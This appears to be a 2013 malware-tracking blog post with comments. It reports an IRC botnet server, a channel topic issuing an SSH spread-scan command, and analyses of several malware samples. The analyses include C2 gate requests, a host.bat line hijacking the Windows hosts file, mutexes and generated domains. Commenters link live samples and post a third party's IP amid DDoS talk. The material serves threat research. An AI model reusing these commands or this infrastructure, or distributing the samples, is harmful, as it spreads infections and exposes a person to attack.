Thanks to anonymous guy in this post for the sample
Resolved : [were.hacked.jp] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x
sample here
hosting infos:
http://whois.domaintools.com/176.31.123.56
Anonymous - May 6, 2013 at 9:26 pm
Here's the "anonymous guy" ip: 190.141.136.71, he's being ddosed for a month.
Anonymous - May 7, 2013 at 4:31 am
Hello pig, just wondering where do you get your maleware from?
Where do you search?
Pig - May 7, 2013 at 3:52 pm
1 month ddos for panama ip ? u must be raged to death lool
Anonymous - May 7, 2013 at 7:35 pm
the sample is deleted can you upload again
Anonymous - May 8, 2013 at 3:19 am
sample http://www.sendspace.com/file/em9buw
Anonymous - May 8, 2013 at 12:32 pm
http://www.sendspace.com/file/w8lb9m
samples_for_pig
http bot i think communicates to random shitted domains.
kinda advanced i think 😀
Anonymous - May 8, 2013 at 2:27 pm
more samples
http://www.sendspace.com/file/xde7we
Pig - May 8, 2013 at 4:26 pm
txx.exe connects here :hxxp://71.236.243.21:3128/G@t3/1nPu7.php
POST /G@t3/1nPu7.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: 71.236.243.21:3128
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache
'x0ex93xafxc0x12xx1c7`x95x9d3^xcfxd6Cxa3x8e;xbbx8ex05
x85x05*xeb`,x1fx8aex00xb0-xc8A<Ex8exeexe4xd7i<Oxa9tZ|x06xcexc8Ux8cxb7Wxd9!Nxd7Kn7x1axcbxf9'@x87x9d
xdf8$&xf2s~ixb3cxb3xf5!x16a(Z kx1d(, Rxe6x85 xdexc3x1bx7fxddxf4x0exc9Kx1f'xed)WxcePx8675Gxa7x04jx7fxe2x8c*B4xddJx1fx87x0fGx85xaf6xa7Y;xd5xd2x184xb1xb7_,pxcaesxb3Hxcfxeexff=x035x8d*x9axc8xd8xaaf|Hxfdx99xabw5x14Qx01xb3xecxf8xf6xa3&xcdxdcxfb
-xafxe2x032xe6x89xa2$x96xc1bxfaxd7
x05Vx15x00\xbexf9xfex9dcaXx80ox84x08xf1xf2x14:
xadxad_5xcbxe9/x8dx96
n($Qx08xdeu3sx91xb4Gwxdd5`xfdx98xae$xfex81x92,xfbxf5#O
Download URLs
hxxp://71.236.243.21/G@t3/j.bin theyre not active now
Outgoing connection to remote server: 71.236.243.21 TCP port 3128
Pig - May 8, 2013 at 4:35 pm
helpxx.exe is a sfx archive with 2 files inside host.bat and winhelp.exe
host.bat:echo 212.114.160.122 inf0nix.com >> %Systemroot%system32driversetchosts
winhelp.exe: connects to hxxp://inf0nix.com/notify.php
Pig - May 8, 2013 at 4:55 pm
this is the domain name for fU1.exe files.g00n.pl the rest are random domain names created by the malware like this http://www.bpfq02.com/www.inform1ongung.info
the http query is this :files.g00n.pl/dev/ip.php
this is the mutex name for this malware:_kuku_joker_v4.00
Pig - May 8, 2013 at 5:05 pm
fsvchost.exe does this:Copies self to other locations
Creates files in windows system directory
Creates system services or drivers
Load system drivers
Mutex created still same:_kuku_joker_v4.00
HTTP Queries:inf1nix.com GET /notify.php HTTP/1.1
http://www.bpfq02.com GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1
http://www.inform1ongung.info GET /t_100_v400/?rnd=252937&id=23104616288 HTTP/1.1
this is the malware version :User-Agent: KUKU v4.00 alpha
malware disables safeboot
new domain name here:inf1nix.com
Pig - May 8, 2013 at 5:09 pm
svchost-x.exe is same shit as txx.exe
Pig - May 8, 2013 at 5:09 pm
thank you for your submitions 🙂
Anonymous - May 8, 2013 at 5:29 pm
what is this bot btw?
Anonymous - May 8, 2013 at 6:51 pm
http://www.sendspace.com/file/awu00i
samplesss…